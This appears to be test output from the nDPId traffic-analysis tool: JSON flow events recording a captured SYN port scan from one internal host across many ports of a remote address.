+00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1874,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061211,"flow_last_seen":1278275061211,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9011,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1874,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061211,"flow_last_seen":1278275061211,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9011,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":179,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058221,"flow_last_seen":1278275058221,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2869,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":179,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058221,"flow_last_seen":1278275058221,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2869,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":195,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058345,"flow_last_seen":1278275058345,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2869,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":195,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058345,"flow_last_seen":1278275058345,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2869,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1687,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061001,"flow_last_seen":1278275061001,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":6969,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1687,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061001,"flow_last_seen":1278275061001,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":6969,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1770,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061104,"flow_last_seen":1278275061104,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":6969,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1770,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061104,"flow_last_seen":1278275061104,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":6969,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1526,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060746,"flow_last_seen":1278275060746,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2875,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1526,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060746,"flow_last_seen":1278275060746,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2875,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1597,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060850,"flow_last_seen":1278275060850,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2875,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1597,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060850,"flow_last_seen":1278275060850,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2875,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00593{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":100,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058030,"flow_last_seen":1278275058030,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":843,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":100,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058030,"flow_last_seen":1278275058030,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":843,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00593{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":150,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058155,"flow_last_seen":1278275058155,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":843,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":150,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058155,"flow_last_seen":1278275058155,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":843,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":253,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058471,"flow_last_seen":1278275058471,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":49999,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":253,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058471,"flow_last_seen":1278275058471,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":49999,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1734,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061051,"flow_last_seen":1278275061051,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":50000,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1734,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061051,"flow_last_seen":1278275061051,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":50000,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1477,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060698,"flow_last_seen":1278275060698,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9040,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1477,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060698,"flow_last_seen":1278275060698,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9040,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":285,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058595,"flow_last_seen":1278275058595,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":49999,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":285,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058595,"flow_last_seen":1278275058595,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":49999,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1820,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061154,"flow_last_seen":1278275061154,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":50000,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1820,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061154,"flow_last_seen":1278275061154,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":50000,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1572,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060801,"flow_last_seen":1278275060801,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9040,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1572,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060801,"flow_last_seen":1278275060801,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9040,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1068,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060116,"flow_last_seen":1278275060116,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":50001,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1068,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060116,"flow_last_seen":1278275060116,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":50001,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1690,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061001,"flow_last_seen":1278275061001,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":50002,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1690,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061001,"flow_last_seen":1278275061001,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":50002,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1129,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060225,"flow_last_seen":1278275060225,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":50001,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1129,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060225,"flow_last_seen":1278275060225,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":50001,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1767,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061104,"flow_last_seen":1278275061104,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":50002,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1767,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061104,"flow_last_seen":1278275061104,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":50002,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1632,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060903,"flow_last_seen":1278275060903,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":50003,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1632,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060903,"flow_last_seen":1278275060903,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":50003,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1340,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060494,"flow_last_seen":1278275060494,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":19283,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1340,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060494,"flow_last_seen":1278275060494,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":19283,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1709,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061004,"flow_last_seen":1278275061004,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":50003,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1709,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061004,"flow_last_seen":1278275061004,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":50003,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1405,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060595,"flow_last_seen":1278275060595,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":19283,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1405,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060595,"flow_last_seen":1278275060595,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":19283,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1794,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061108,"flow_last_seen":1278275061108,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":50006,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 